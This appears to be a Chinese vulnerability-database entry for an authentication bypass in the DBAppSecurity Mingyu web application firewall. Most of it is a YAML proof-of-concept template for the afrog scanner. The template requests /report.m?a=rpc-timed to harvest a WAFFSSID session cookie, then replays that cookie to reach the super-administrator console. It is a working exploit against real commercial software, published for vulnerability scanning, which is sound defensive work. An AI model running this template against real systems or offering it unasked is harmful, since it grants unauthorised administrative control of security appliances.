dbappsecurity-mingyu-report-user-bypass: 明御 WEB 应用防火墙 bypass

日期: 2025-08-01 | 影响软件: 明御WEB应用防火墙 | POC: 已公开

漏洞描述

安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台

PoC代码[已公开]

id: dbappsecurity-mingyu-report-user-bypass

info:
  name: 明御 WEB 应用防火墙 bypass
  author: 123456
  severity: high
  description: |-
    安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
  tags: dbappsecurity,mingyu,bypass
  created: 2023/09/05

rules:
  r0:
    request:
      method: GET
      path: /report.m?a=rpc-timed
    expression: response.status == 200 && response.body.bcontains(b'error_0x110005')
    output:
      search: '"Set-Cookie: WAFFSSID=(?P<waffssid>.*?);".bsubmatch(response.raw_header)'
      waffssid: search["waffssid"]
  r1:
    request:
      method: GET
      path: /
      headers:
        Cookie: "WAFFSSID={{waffssid}}"
    expression: response.status == 200 && response.body.bcontains(b'console') && response.body.bcontains(b'退出') && response.body.bcontains(b'超级管理员')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-report-user-bypass.yaml

相关漏洞推荐